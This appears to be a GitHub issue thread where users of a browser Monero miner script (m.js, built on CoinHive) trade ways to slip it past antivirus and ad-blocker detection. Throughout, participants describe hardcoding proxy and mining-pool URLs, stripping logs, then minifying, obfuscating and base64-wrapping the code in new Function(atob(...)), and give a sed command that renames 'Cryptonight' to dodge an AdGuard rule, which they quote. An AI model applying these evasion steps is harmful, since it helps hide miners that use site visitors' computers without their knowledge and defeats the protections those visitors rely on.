Decrypted m.js

[cron13]

hey guys, can u release decrypted version of m.js, I want to recompile it. At the moment many antiviruses detect it as a virus

[cazala]

https://gist.github.com/cazala/50ab1e141736c8a327b26b923a1448e6

[cron13]

Thanks, can you tell us a good utility for obfuscating js? All that I have found so far does not help against some antiviruses :-(

Ikarus PUA.CoinMiner Kaspersky HEUR: Trojan.Script.Generic Symantec PUA.JScoinminer 20171213 ZoneAlarm by Check Point HEUR: Trojan.Script.Generic

[cazala]

Mm i didn't do much, I just used https://javascriptobfuscator.com/ and then converted the whole code to base64, and put it into a new Function(atob("base64source"));

[cazala]

Maybe the source could also be minified before/after obfuscating it.

[cron13]

Thanks, I will experiment. If this works out. then I will write here

[adamdupuis]

To get it undetected by Kaspersky I only hardcoded the proxy and removed the console.log() calls in m.js then obfuscated it using the same website mentioned above. Then I base64 encoded as mentioned above. I would minify it before obfuscating as well.

[cazala]

so @adamdupuis you don't have to load the .js file using the ?proxy= query param right? I believe that's the rule they are using to block it.

[cazala]

because I think it gets blocked even before the file is loaded at all, so it has to do with the url.

[adamdupuis]

In the version where I deobfuscated your m.js I still need to call it with m.js?proxy= but I do not add a value to the parameter. Since modifying CoinHive's code I removed the need for the proxy parameter.

[cazala]

Mm okay then maybe my theory is wrong. But I don't see why you need to pass the ?proxy= query param?

[cazala]

Is it because of the throw new Error("missing '?proxy' query parameter in your proxy url!"); ?

[adamdupuis]

Yes, I was working with your obfuscated m.js and it was too much work to figure out how to remove the need for it completely so I just left it in. Once I ensure my new version is undetected I will use it without needing the proxy parameter.

[cazala]

Okay, let me know if you make any progress :)

[cron13]

adamdupuis solution work, thank you!

So, i hardcode proxyUrl and libUrl like this:

var libUrl = 'http://myserver.com/proxyurl/';
const proxyUrl = 'wss://myserver.com:8892?pool=pool.supportxmr.com:3333';

and remove throw new Error and console.log

Then i minify this by https://www.minifier.org Then obfuscate with https://javascriptobfuscator.com And encode result to base64 And put it into new Function(atob("base64source"))();

[cazala]

nice, i ll update the assets soon

[cron13]

damn, adguard made new filter that detect miner - https://github.com/AdguardTeam/AdguardFilters/blob/8611f98972689e4001b8cb7861e1cab626755b60/EnglishFilter/sections/general_extensions.txt that filter based on js code: if (a instanceof Array && "string" === typeof a[0] && 0 <= a[0].indexOf("Cryptonight")) { as I understand this code is just looking for the word "Cryptonight" in the js files of the site. I try to rename all "Cryptonight", but after this i got errors like failed to asynchronously prepare wasm: TypeError: undefined is not an object (evaluating 'Module["asm"]["_crnt_create"].apply') TypeError: undefined is not an object (evaluating 'Module["asm"]["_crnt_create"].apply')

Any ideas?

[cazala]

I'll look into it during the weekend, but yea i noticed the traffic going thru the proxy decreased in the last days to a 5% from what it has been the last weeks, it's probably these guys getting smarter

[phr34k0]

damn, adguard made new filter that detect miner - https://github.com/AdguardTeam/AdguardFilters/blob/8611f98972689e4001b8cb7861e1cab626755b60/EnglishFilter/sections/general_extensions.txt that filter based on js code: if (a instanceof Array && "string" === typeof a[0] && 0 <= a[0].indexOf("Cryptonight")) { as I understand this code is just looking for the word "Cryptonight" in the js files of the site. I try to rename all "Cryptonight", but after this i got errors like failed to asynchronously prepare wasm: TypeError: undefined is not an object (evaluating 'Module["asm"]["_crnt_create"].apply') TypeError: undefined is not an object (evaluating 'Module["asm"]["_crnt_create"].apply')

Man glad the community here is super active. Looks like @cron13 beat me to it. I'll go delete my issue on that same adguard filter. Here's what adguard be using on it's english filter https://filters.adtidy.org/extension/chromium/filters/2.txt

[adamdupuis]

If you base64 encode the Javascript, Adguard should not be able to detect if "Cryptonight" is in there - or can it?

[phr34k0]

Already tried. No dice. Will wait till @cron13 figures a way . @cazala won't be back till the weekends

[amittell]

Tested this and it stops AdGuard from detecting it.

sed -i 's:Cryptonight:CN:g' m.js

Obviously you need to run this on the decoded m.js, then re-obfuscate and encode it.

[cazala]

I'll make these changes to the assets soon, thanks everyone for helping out :)

[adamdupuis]

Is this just a search and replace?

[amittell]

Yep, working for me and AdGuard doesn't detect it.

https://gist.github.com/amittell/44f868ec729430a9981babe931cef490

[Akuka]

@amittell should you do the same for 'a.js'? its also contains "Cryptonight"

[amittell]

@Akuka I didn't, AdGaurd doesn't seem to detect it as it is.

[cazala]

The a.js file (asmjs) is not used if WebAssembly is supported. You can force the miner to use asm and test if it gets detected by AdGuard by doing this:

var miner = CH.Anonymous('site-key', { forceASMJS: true });
miner.start();

[Worldand]

Avast web shield also detect "Cryptonight"

[Worldand]

With what we need to replace "Cryptonight" ?

[amittell]

Anything that's not "Cryptonight" ;)

In my sed above I just replaced it with "CN".

[Worldand]

Tried but it didn't works(the miner doesn't start)

[adamdupuis]

Yeah the miner won't start for me either when I did a find and replace "cryptonight" to "CRY" - I chose something other than "CN" because I wanted to be able to find it later and "cn" is commonly found throughout the script.